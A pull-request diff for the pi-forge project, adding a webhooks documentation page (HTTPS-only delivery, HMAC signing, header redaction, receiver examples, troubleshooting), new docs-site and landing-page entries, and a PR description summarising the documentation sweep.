+The URL must be `https://`. The route validates this; `http://`,
+`ssh://`, file URLs all 400 with `unsupported_protocol`.
+
+### HMAC-SHA256 signatures
+
+Configure a **secret** on the webhook to get signed deliveries.
+Every POST then carries:
+
+```
+X-Pi-Forge-Signature: sha256=<hex digest of the raw JSON body>
+```
+
+Convention matches GitHub's webhook signing. Verify on the
+receiver side:
+
+```python
+import hmac, hashlib
+
+def verify(secret: bytes, body: bytes, header: str) -> bool:
+    expected = "sha256=" + hmac.new(secret, body, hashlib.sha256).hexdigest()
+    return hmac.compare_digest(expected, header)
+```
+
+Secrets are stored in `${FORGE_DATA_DIR}/webhooks.json` (mode
+`0600`) and **never returned over the wire** — the API surfaces a
+`hasSecret: boolean` flag instead of the value. Same posture as
+`auth.json` provider keys.
+
+### Self-signed / corporate CA endpoints
+
+For internal webhook targets behind a private CA, set the
+per-webhook **"Allow self-signed / invalid TLS certificate"**
+checkbox. Every delivery for that webhook then uses an
+`https.Agent({ rejectUnauthorized: false })` and writes a
+`webhook-insecure-tls` line to stderr — so the relaxed posture
+is visible in `docker logs`.
+
+The flag **only** relaxes cert validation. The URL must still be
+HTTPS; `insecureTls` won't accept `http://`.
+
+### Custom headers (Bearer tokens, etc.)
+
+Each webhook can carry a set of static request headers — typical
+use is `Authorization: Bearer <token>` for receivers that need
+their own auth. Headers are stored alongside the rest of the
+config but treated as secret:
+
+- **Header values are redacted on the wire.** `GET /webhooks` and
+  `GET /webhooks/:id` return the header NAMES verbatim but
+  replace every VALUE with the `***REDACTED***` sentinel — the
+  same convention `config-manager.ts` uses for inline `apiKey` in
+  `models.json`. The wire never carries the real value.
+- **Editing in the UI preserves stored values.** When the client
+  PATCHes back a header value that's literally the sentinel, the
+  server treats it as "keep the existing value." Typing a new
+  value replaces; deleting the field clears the header.
+- **CREATE rejects the sentinel** as a real value — no prior to
+  keep on a fresh create.
+- **Defense-in-depth at dispatch time**: if the sentinel ever
+  ends up in the stored config (hand-edit, future bug), the
+  dispatcher skips it at outbound-POST time so the receiver
+  never sees `Authorization: ***REDACTED***`.
+
+### Reserved headers
+
+The following headers are set by pi-forge on every delivery and
+**cannot** be overridden by config:
+
+- `Content-Type` (always `application/json`)
+- `X-Pi-Forge-Event` (event name)
+- `X-Pi-Forge-Delivery` (UUID for this attempt)
+- `X-Pi-Forge-Signature` (HMAC if a secret is configured)
+- `User-Agent` (pi-forge version)
+
+A configured header with one of these names is silently dropped.
+
+## Delivery history
+
+Every attempt (success or failure) is appended to
+`${FORGE_DATA_DIR}/webhook-deliveries.json`, capped at **100 per
+webhook** (rolling FIFO). Surfaced in **Settings → Webhooks** under
+the per-webhook drawer, and via `GET /webhooks/:id/deliveries`.
+
+Use it to debug a stuck receiver — `errorPreview` on failed
+attempts shows the first 200 chars of the response body.
+
+## MINIMAL_UI
+
+Webhook configuration is **disabled under `MINIMAL_UI=true`**: the
+Settings tab is hidden, and `POST` / `PATCH` / `DELETE` /
+`/test` routes return `403 minimal_ui_disabled`. The `GET` routes
+stay available so an operator can still audit what's wired up,
+and event delivery for already-configured webhooks still fires.
+
+The rationale: webhooks let the server make arbitrary HTTPS calls
+to user-supplied URLs. Under MINIMAL_UI (locked-down deploys),
+only the operator should configure that — via direct file edits
+to `${FORGE_DATA_DIR}/webhooks.json` or via env-driven config
+management.
+
+## Storage
+
+| File | Purpose | Mode |
+|---|---|---|
+| `webhooks.json` | Webhook configs (URLs, events, scope, secrets, headers, TLS flag) | `0600` — contains HMAC secrets |
+| `webhook-deliveries.json` | Rolling delivery history (cap 100 / webhook) | `0600` |
+
+Atomic-write + in-process lock pattern (see `project-manager.ts`
+for the same posture). Single-tenant / single-process assumption
+— cross-process safety would need a real file lock.
+
+## REST surface
+
+| Method + path | Purpose |
+|---|---|
+| `GET /api/v1/webhooks[?projectId=…]` | List webhooks. Optional filter returns global ∪ per-project for one project. |
+| `POST /api/v1/webhooks` | Create. Validates HTTPS-only URL, non-empty event subscription, known event types. |
+| `PATCH /api/v1/webhooks/:id` | Partial update. Sentinel-in-header semantics described above. |
+| `DELETE /api/v1/webhooks/:id` | Delete + prune deliveries. |
+| `POST /api/v1/webhooks/:id/test` | Fire a synthetic `webhook.test` event at the target, bypassing the event/scope filter — useful for verifying URL + signature wiring before waiting for a real event. |
+| `GET /api/v1/webhooks/:id/deliveries` | Recent attempts (newest first), capped at 100 per webhook. |
+
+Mutation routes are gated by MINIMAL_UI; the `GET` routes are not.
+
+Full schemas at `/api/docs`.
+
+## Receiver examples
+
+### Python (FastAPI)
+
+```python
+import hmac, hashlib, os
+from fastapi import FastAPI, Header, HTTPException, Request
+
+app = FastAPI()
+SECRET = os.environ["WEBHOOK_SECRET"].encode()
+
+@app.post("/pi-forge")
+async def receive(
+    request: Request,
+    x_pi_forge_signature: str | None = Header(None),
+    x_pi_forge_event: str | None = Header(None),
+):
+    body = await request.body()
+    if x_pi_forge_signature is None:
+        raise HTTPException(401, "missing signature")
+    expected = "sha256=" + hmac.new(SECRET, body, hashlib.sha256).hexdigest()
+    if not hmac.compare_digest(expected, x_pi_forge_signature):
+        raise HTTPException(401, "bad signature")
+    payload = await request.json()
+    # …handle by payload["event"] ...
+    return {"ok": True}
+```
+
+### Node (Express)
+
+```js
+import express from "express";
+import crypto from "node:crypto";
+
+const app = express();
+const SECRET = process.env.WEBHOOK_SECRET;
+
+app.post("/pi-forge", express.raw({ type: "application/json" }), (req, res) => {
+  const sig = req.get("X-Pi-Forge-Signature");
+  const expected = "sha256=" + crypto.createHmac("sha256", SECRET)
+    .update(req.body).digest("hex");
+  if (!sig || !crypto.timingSafeEqual(Buffer.from(sig), Buffer.from(expected))) {
+    return res.status(401).end("bad signature");
+  }
+  const payload = JSON.parse(req.body.toString());
+  // …handle by payload.event ...
+  res.json({ ok: true });
+});
+```
+
+## Troubleshooting
+
+**Deliveries show `failed` with no detail.** Check the receiver's
+TLS chain — pi-forge requires a valid cert by default. If the
+target is internal with a self-signed cert or a private CA, flip
+the per-webhook **Allow self-signed / invalid TLS certificate**
+checkbox.
+
+**`unsupported_protocol` on CREATE.** The URL must be HTTPS.
+Pi-forge intentionally refuses plain HTTP even when `insecureTls`
+is set — the flag relaxes cert validation, not the scheme.
+
+**The test event arrives but real events don't.** Check the
+event subscription on the webhook (`events` array) and the
+scope. A per-project webhook only fires for events whose
+`projectId` matches.
+
+**Header value lost after editing.** If you PATCHed without
+including the headers field at all, the server leaves stored
+headers alone (the route can't distinguish "omitted" from
+"cleared" in JSON). If you PATCHed with the field present but a
+value set to the literal `***REDACTED***` sentinel, that
+specifically means "keep the existing value" — typing a new
+value replaces it.
+
+**MINIMAL_UI disable surprised me.** The Webhooks Settings tab
+hides under MINIMAL_UI and POST/PATCH/DELETE routes 403. Already-
+configured webhooks still fire — disable applies only to config
+changes. To reach the config under MINIMAL_UI, edit
+`${FORGE_DATA_DIR}/webhooks.json` directly (mode `0600`) and
+restart.
+
+## See also
+
+- [`orchestration.md`](./orchestration.md) — the in-app equivalent
+  of webhook fan-out. Orchestration routes worker events back to
+  a supervisor session's inbox; webhooks route them out over
+  HTTPS. Same underlying event bridge feeds both.
+- [`sse-events.md`](./sse-events.md) — the streaming-pull
+  alternative for real-time consumers.
+- [`processes.md`](./processes.md) — what triggers `process_alert`.
+- [`ask-user-question.md`](./ask-user-question.md) — what triggers
+  `ask_user_question`.
+- [`CLAUDE.md`](../CLAUDE.md) — file-by-file map of the
+  `packages/server/src/webhooks/` module.

--- a/scripts/build-site.mjs
+++ b/scripts/build-site.mjs
@@ -83,7 +83,45 @@ const SOURCES = [
     src: "docs/mcp.md",
     out: "mcp.html",
     title: "MCP Servers",
-    subtitle: "Connecting external Model Context Protocol servers.",
+    subtitle: "Remote and stdio Model Context Protocol servers, with per-project trust.",
+  },
+  {
+    src: "docs/webhooks.md",
+    out: "webhooks.html",
+    title: "Webhooks",
+    subtitle:
+      "HTTPS POST deliveries on agent and session events. HMAC signing, retry, delivery history.",
+  },
+  {
+    src: "docs/orchestration.md",
+    out: "orchestration.html",
+    title: "Session Orchestration",
+    subtitle:
+      "Supervisor sessions that spawn, observe, and coordinate worker sessions in the same project.",
+  },
+  {
+    src: "docs/processes.md",
+    out: "processes.html",
+    title: "Background Processes",
+    subtitle: "The process tool — long-running processes the agent manages across turns.",
+  },
+  {
+    src: "docs/todo.md",
+    out: "todo.html",
+    title: "Todo Tool",
+    subtitle: "Browser-native todo tool — session-scoped task list with live UI panel.",
+  },
+  {
+    src: "docs/ask-user-question.md",
+    out: "ask-user-question.html",
+    title: "Ask User Question",
+    subtitle: "Browser-native ask_user_question tool — structured questionnaires from the agent.",
+  },
+  {
+    src: "docs/quick-actions.md",
+    out: "quick-actions.html",
+    title: "Quick Actions",
+    subtitle: "Operator-defined chat-toolbar chips for shell commands and prompt templates.",
   },
   {
     src: "docs/sse-events.md",
@@ -313,12 +351,32 @@ ${HEADER_NAV_LANDING}
       <div class="feature-card">
         <div class="feature-icon">&#128279;</div>
         <h3>MCP server integration</h3>
-        <p>Connect remote Model Context Protocol servers over StreamableHTTP or SSE. Per-project <code>.mcp.json</code> overrides, header status badge, and a master kill-switch for restricted environments.</p>
+        <p>Connect remote Model Context Protocol servers (StreamableHTTP / SSE) AND local stdio servers. Per-project <code>.mcp.json</code> with a per-project trust gate on stdio, header status badge, and a master kill-switch for restricted environments.</p>
       </div>
       <div class="feature-card">
         <div class="feature-icon">&#128736;</div>
         <h3>Per-tool enable / disable</h3>
         <p>Every tool the agent could call — pi's seven built-ins plus each MCP server's tools — toggleable individually with per-project overrides. Allow-by-default; changes apply on the next session.</p>
+      </div>
+      <div class="feature-card">
+        <div class="feature-icon">&#128104;&#8205;&#128104;&#8205;&#128103;</div>
+        <h3>Session orchestration</h3>
+        <p>Opt-in supervisor mode for a session: spawn worker sessions, watch their inboxes, course-correct mid-execution, hand off context. Hub-and-spoke topology, same-project, depth=1; off unless <code>ORCHESTRATION_ENABLED=true</code>.</p>
+      </div>
+      <div class="feature-card">
+        <div class="feature-icon">&#128268;</div>
+        <h3>Webhooks</h3>
+        <p>HTTPS POST deliveries on agent and session events — turn-end, ask-user-question, process alerts, retry failures, compaction, lifecycle. Global or per-project scope, HMAC-SHA256 signing, retry with exponential backoff, delivery history.</p>
+      </div>
+      <div class="feature-card">
+        <div class="feature-icon">&#9881;&#65039;</div>
+        <h3>Background-process tool</h3>
+        <p>The <code>process</code> tool lets the agent spawn long-running processes — dev servers, watchers, builds — that outlive a single turn. Per-session manager, log capture, regex watches, alerts on exit.</p>
+      </div>
+      <div class="feature-card">
+        <div class="feature-icon">&#9889;</div>
+        <h3>Quick actions</h3>
+        <p>Operator-defined chips in the chat toolbar that either run a shell command in the active project or insert/send a templated prompt. Your personal toolbox for the things you run twenty times a day.</p>
       </div>
       <div class="feature-card">
         <div class="feature-icon">&#128172;</div>


### PR DESCRIPTION
## Summary

Documentation sweep covering the features that shipped recently without a docs surface:

| Surface | Before | After |
|---|---|---|
| `docs/orchestration.md` | none | full feature doc (topology, tool surface, wake-up, safety, REST, UI, troubleshooting) |
| `docs/webhooks.md` | none | full feature doc (events, scoping, retry/timeout, security, MINIMAL_UI gate, receiver examples) |
| `docs/quick-actions.md` | none | full feature doc (command vs prompt, scrubbed env, MINIMAL_UI gate, REST) |
| `docs/processes.md`, `docs/todo.md`, `docs/ask-user-question.md` | existed but not in site sidebar | now in docs site nav + linked from README + configuration.md |
| `docs/mcp.md` | already covered stdio | description updated on landing + sidebar subtitle |
| Docker config | `ORCHESTRATION_ENABLED` missing entirely | wired in `docker/docker-compose.yml` + `docker/.env.example` with rationale |

## Docker gap — was missing entirely

The orchestration feature shipped without surfacing its env vars in the documented compose path. Operators following `cp docker/.env.example docker/.env` had no signal that the toggle existed. Fixed:

```yaml
# docker/docker-compose.yml additions
- ORCHESTRATION_ENABLED=${ORCHESTRATION_ENABLED:-false}
- ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR=${ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR:-8}
```

Matching documented entries in `docker/.env.example` with the two-tier opt-in explanation (env enables the toggle, user opts in per session).

## README + landing page

- Features list in README.md gains six bullets: STDIO MCP (existing card updated, no new card), session orchestration, webhooks, background-process tool, browser-native todo + ask_user_question, quick actions.
- Landing page (`docs/site/index.html`) gains four new feature cards: orchestration, webhooks, background processes, quick actions. MCP card description updated to mention stdio + per-project trust.
- Docs index in README reorganised under "Configure & extend" to surface every feature doc.

## Site generator

`scripts/build-site.mjs` SOURCES gains seven entries:

- New (3): `webhooks.md`, `orchestration.md`, `quick-actions.md`
- Surfaced but already existed (4): `processes.md`, `todo.md`, `ask-user-question.md` — these were authored as proper docs but never added to the sidebar

After this PR the docs site has 14 doc pages (was 8).

## Test plan

- [x] `npm run build:site` writes 14 doc pages without warnings
- [x] `npm run check` clean (typecheck + lint + format)
- [x] Full test suite still 39/39 (`scripts/run-tests.sh --ci`)
- [ ] **Manual smoke**: pull the GitHub Pages build after merge and click through the new sidebar entries; confirm they render
- [ ] **Manual smoke**: copy `docker/.env.example` to `docker/.env`, set `ORCHESTRATION_ENABLED=true`, `docker compose up --build`, confirm the `Orch` toggle appears in the chat-view toolbar

## Out of scope

- AGENTS.md / CLAUDE.md were already updated as part of each feature's PR (they're agent-facing reference, kept current per-feature).
- The CHANGELOG isn't touched here — these are documentation-only changes for already-shipped features, not user-facing behaviour.